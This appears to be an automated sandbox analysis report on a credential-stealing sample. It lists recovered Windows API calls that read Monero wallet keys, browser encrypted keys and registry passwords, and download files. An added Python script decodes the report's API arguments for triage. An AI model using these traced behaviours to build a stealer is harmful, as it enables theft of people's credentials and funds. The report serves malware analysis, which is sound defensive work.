                                      • Instruction Fuzzy Hash: 09510F7091014AABCB14FF60DD9AAEE7F79BF90300F504018F44A6B591EF346B45DB62
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 8511afa1561263e19aa7d42d56bb4adfb37a60a8aeeb2a4eda91e4f6eac73956
                                      • Instruction ID: e40f858b2c6a049f5cb0368279fb87e28e0bae6f3cc714b95c29c23a20d595b4
                                      • Opcode Fuzzy Hash: 8511afa1561263e19aa7d42d56bb4adfb37a60a8aeeb2a4eda91e4f6eac73956
                                      • Instruction Fuzzy Hash: 13C1A8B6900219ABCB14EF60DC8DFEA7B78BBA4304F104598F50AA7141DF74AA85CF95
                                      APIs
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 005342EC
                                      • lstrcat.KERNEL32(?,00F1E620), ref: 0053430B
                                      • lstrcat.KERNEL32(?,?), ref: 0053431F
                                      • lstrcat.KERNEL32(?,00F1D488), ref: 00534333
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 00538D90: GetFileAttributesA.KERNEL32(00000000,?,00521B54,?,?,0054564C,?,?,00540E1F), ref: 00538D9F
                                        • Part of subcall function 00529CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00529D39
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 005393C0: GlobalAlloc.KERNEL32(00000000,005343DD,005343DD), ref: 005393D3
                                      • StrStrA.SHLWAPI(?,00F1E5F0), ref: 005343F3
                                      • GlobalFree.KERNEL32(?), ref: 00534512
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529AEF
                                        • Part of subcall function 00529AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00524EEE,00000000,?), ref: 00529B01
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529B2A
                                        • Part of subcall function 00529AC0: LocalFree.KERNEL32(?,?,?,?,00524EEE,00000000,?), ref: 00529B3F
                                      • lstrcat.KERNEL32(?,00000000), ref: 005344A3
                                      • StrCmpCA.SHLWAPI(?,005408D1), ref: 005344C0
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 005344D2
                                      • lstrcat.KERNEL32(00000000,?), ref: 005344E5
                                      • lstrcat.KERNEL32(00000000,00540FB8), ref: 005344F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                      • String ID:
                                      • API String ID: 3541710228-0
                                      • Opcode ID: 91c70b4f0856570a9b86db43a4044ba3db7841ac336c90ec6a87e6c0576bbc81
                                      • Instruction ID: 4b8be17dd6e2800baf0b0a193baf7fe8bcc09ebea93aafb32b04ba199c0484b8
                                      • Opcode Fuzzy Hash: 91c70b4f0856570a9b86db43a4044ba3db7841ac336c90ec6a87e6c0576bbc81
                                      • Instruction Fuzzy Hash: 38714876900219B7CB14EBA0DC89FEE7779BF88300F048598F605A7181DA75EB45CF91
                                      APIs
                                        • Part of subcall function 005212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005212B4
                                        • Part of subcall function 005212A0: RtlAllocateHeap.NTDLL(00000000), ref: 005212BB
                                        • Part of subcall function 005212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005212D7
                                        • Part of subcall function 005212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005212F5
                                        • Part of subcall function 005212A0: RegCloseKey.ADVAPI32(?), ref: 005212FF
                                      • lstrcat.KERNEL32(?,00000000), ref: 0052134F
                                      • lstrlen.KERNEL32(?), ref: 0052135C
                                      • lstrcat.KERNEL32(?,.keys), ref: 00521377
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 00538B60: GetSystemTime.KERNEL32(00540E1A,00F0FB78,005405AE,?,?,005213F9,?,0000001A,00540E1A,00000000,?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 00538B86
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00521465
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                      • DeleteFileA.KERNEL32(00000000), ref: 005214EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: bbb9fb3e995b5ae00383523787348a029c5cf3968f3b1403b573eb5a1115937d
                                      • Instruction ID: 5fe1472ba31ea8c0e35898cd29d8044ecead94fc6dfaf430d812ed30194f2efb
                                      • Opcode Fuzzy Hash: bbb9fb3e995b5ae00383523787348a029c5cf3968f3b1403b573eb5a1115937d
                                      • Instruction Fuzzy Hash: B25155B2D5011A67CB15FB60DC96FED773CBF94300F404198B64A62081EE746B89CFA6
                                      APIs
                                        • Part of subcall function 005272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0052733A
                                        • Part of subcall function 005272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005273B1
                                        • Part of subcall function 005272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0052740D
                                        • Part of subcall function 005272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00527452
                                        • Part of subcall function 005272D0: HeapFree.KERNEL32(00000000), ref: 00527459
                                      • lstrcat.KERNEL32(00000000,005417FC), ref: 00527606
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00527648
                                      • lstrcat.KERNEL32(00000000, : ), ref: 0052765A
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 0052768F
                                      • lstrcat.KERNEL32(00000000,00541804), ref: 005276A0
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 005276D3
                                      • lstrcat.KERNEL32(00000000,00541808), ref: 005276ED
                                      • task.LIBCPMTD ref: 005276FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: a769f225e4aa5a63800da0cd973372462e6e69e795b01c3f31d8c8a6e11fe05c
                                      • Instruction ID: 57b03972a81825d38c2d0fc62ffa28aa7b2612f546d1a4b8f5cdf275c60fa8d8
                                      • Opcode Fuzzy Hash: a769f225e4aa5a63800da0cd973372462e6e69e795b01c3f31d8c8a6e11fe05c
                                      • Instruction Fuzzy Hash: 72312F7190120AEBCB05EBF4EC59DFE7B74BF89301B148118E103B72A1DA78A946CF56
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F1E218,00000000,?,00540E2C,00000000,?,00000000), ref: 00538130
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00538137
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00538158
                                      • __aulldiv.LIBCMT ref: 00538172
                                      • __aulldiv.LIBCMT ref: 00538180
                                      • wsprintfA.USER32 ref: 005381AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 9d3891db55d912dcc8a16f5e18bfe9282b4a1deb53c1d4d91326ae26e676299e
                                      • Instruction ID: 722dd29b419f339b1b261476511c4651af6915fce587453ccec7a175dd9db09e
                                      • Opcode Fuzzy Hash: 9d3891db55d912dcc8a16f5e18bfe9282b4a1deb53c1d4d91326ae26e676299e
                                      • Instruction Fuzzy Hash: 2F211DB1E44319ABDB04DFD4DD49FAEBBB8FB44B10F104519F605BB280D7B869018BA9
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 005247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00524839
                                        • Part of subcall function 005247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00524849
                                      • InternetOpenA.WININET(00540DF7,00000001,00000000,00000000,00000000), ref: 0052610F
                                      • StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526147
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0052618F
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005261B3
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 005261DC
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0052620A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00526249
                                      • InternetCloseHandle.WININET(?), ref: 00526253
                                      • InternetCloseHandle.WININET(00000000), ref: 00526260
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: efbfaf289202fab1e6cae2296873da788ddc0c608b1c9a50664dc1f1a8c3cf17
                                      • Instruction ID: a414e207827295996a138bb13afa5187e37561062822d272e521bb3b024d0952
                                      • Opcode Fuzzy Hash: efbfaf289202fab1e6cae2296873da788ddc0c608b1c9a50664dc1f1a8c3cf17
                                      • Instruction Fuzzy Hash: 0C514EB1900218ABDB24DF50DC49BEE7BB8FF44701F108098F606A71C1DBB46A85CF95
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0052733A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005273B1
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0052740D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00527452
                                      • HeapFree.KERNEL32(00000000), ref: 00527459
                                      • task.LIBCPMTD ref: 00527555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                       • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: 6592440212915af7cff5f0dd4db61c1af5846deb94976671aaf276b892c8f3b5
                                      • Instruction ID: 1ebf21c3e07d9444204fa31f98916025e174a9f500a394c7d6efb7d876120826
                                      • Opcode Fuzzy Hash: 6592440212915af7cff5f0dd4db61c1af5846deb94976671aaf276b892c8f3b5
                                      • Instruction Fuzzy Hash: 28613CB5D0426D9BDB24DB50DC45FE9BBB8BF49300F0081E9E649A6181DBB05BC9CFA0
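The API lists above carry the raw argument values the sandbox recovered, and most of the analysis value sits in those numbers: RegOpenKeyExA(80000001,?,00000000,00020019,?) in the Password-enumeration function and RegOpenKeyExA(...,00020119,...) in the Monero wallet_path lookup, CreateFileA(...,80000000,00000001,...,00000003,...) in the shared read helper versus CreateFileA(...,40000000,00000003,...,00000002,00000080,...) in the WinINet download-to-disk function, CryptStringToBinaryA dwFlags 00000001 and InternetOpenUrlA dwFlags 00000100. The Python below is an added example and not part of the report: it parses lines in the report's own "api.MODULE(args), ref: address" format, including the "Part of subcall function" prefix, and annotates the arguments whose meaning is fixed by the Windows SDK headers (HKEY_CURRENT_USER, KEY_READ with KEY_WOW64_64KEY, GENERIC_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, CRYPT_STRING_BASE64, INTERNET_FLAG_PRAGMA_NOCACHE, CSIDL_LOCAL_APPDATA). The constant values are from the SDK; the sample lines are copied from this report; the argument positions assume the documented parameter order of each API; the helper names are the example's own.

```python
import re
from typing import Dict, List, Optional, Tuple, Union

# Constructed input: API lines copied verbatim from the "APIs" lists of this report.
SAMPLE_API_LINES = """
  • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
• StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00529D39
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529AEF
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0052733A
• lstrcat.KERNEL32(?,.keys), ref: 00521377
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0052618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005261B3
• task.LIBCPMTD ref: 005276FB
"""

# One "api.MODULE(args), ref: address" line, optionally prefixed with the
# "Part of subcall function XXXXXXXX:" marker the report uses for callees.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

Arg = Union[int, str, None]   # None stands for the report's '?' (value not recovered)

def parse_arg(token: str) -> Arg:
    t = token.strip()
    if t == "?":
        return None
    if re.fullmatch(r"-?[0-9A-F]{8}", t):     # 32-bit value as the report prints it
        return int(t, 16) & 0xFFFFFFFF
    return token                                # a string literal seen in the call (an IOC)

def parse_api_line(line: str) -> Optional[dict]:
    m = LINE_RE.match(line)
    if not m:
        return None
    field = m.group("args")
    # Caveat: a literal containing a comma would be split here; none in this report do.
    args = [parse_arg(a) for a in field.split(",")] if field is not None else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub")}

# Values from the Windows SDK headers, keyed by (API, zero-based argument index).
ENUMS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("RegOpenKeyExA", 0): {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
                           0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"},
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("InternetOpenA", 1): {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                           3: "INTERNET_OPEN_TYPE_PROXY"},
    ("SHGetFolderPathA", 1): {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"},
}
FLAGS: Dict[Tuple[str, int], List[Tuple[int, str]]] = {   # composite masks listed first
    ("RegOpenKeyExA", 3): [(0x20019, "KEY_READ"), (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")],
    ("CreateFileA", 1): [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")],
    ("CreateFileA", 2): [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")],
    ("CreateFileA", 5): [(0x80, "FILE_ATTRIBUTE_NORMAL"), (0x2, "FILE_ATTRIBUTE_HIDDEN")],
    ("CryptStringToBinaryA", 2): [(0x1, "CRYPT_STRING_BASE64")],
    ("InternetOpenUrlA", 4): [(0x80000000, "INTERNET_FLAG_RELOAD"), (0x800000, "INTERNET_FLAG_SECURE"),
                              (0x100, "INTERNET_FLAG_PRAGMA_NOCACHE")],
}

def decode_flags(value: int, table: List[Tuple[int, str]]) -> str:
    if value == 0:
        return "0"
    names, rest = [], value
    for bit, name in table:
        if (rest & bit) == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))             # bits the table does not know
    return "|".join(names)

def decode_call(rec: dict) -> List[str]:
    """Annotate the integer arguments of one parsed call whose meaning the SDK fixes."""
    notes = []
    for i, a in enumerate(rec["args"]):
        if not isinstance(a, int):
            continue
        key = (rec["api"], i)
        if key in ENUMS:
            notes.append(f"arg{i}={ENUMS[key].get(a, hex(a))}")
        elif key in FLAGS:
            notes.append(f"arg{i}={decode_flags(a, FLAGS[key])}")
    return notes

def annotate(text: str) -> List[Tuple[str, List[str]]]:
    """Parse every API line in `text` and return (api, annotations) per call."""
    return [(r["api"], decode_call(r)) for r in map(parse_api_line, text.splitlines()) if r]

def string_iocs(text: str) -> List[str]:
    """Collect the string literals the report recovered as call arguments."""
    recs = [r for r in map(parse_api_line, text.splitlines()) if r]
    return [a for r in recs for a in r["args"] if isinstance(a, str)]

if __name__ == "__main__":
    for api, notes in annotate(SAMPLE_API_LINES):
        print(f"{api:22s} {' '.join(notes)}")
    print("strings:", string_iocs(SAMPLE_API_LINES))
```

Read together, the decoded values tell the story the raw hex hides: the read helper opens files with GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING (it only reads what already exists), while the WinINet routine opens with GENERIC_WRITE and CREATE_ALWAYS to drop a downloaded payload, and the registry lookups run as KEY_READ against HKEY_CURRENT_USER, the one hive a non-elevated stealer can always reach.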
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
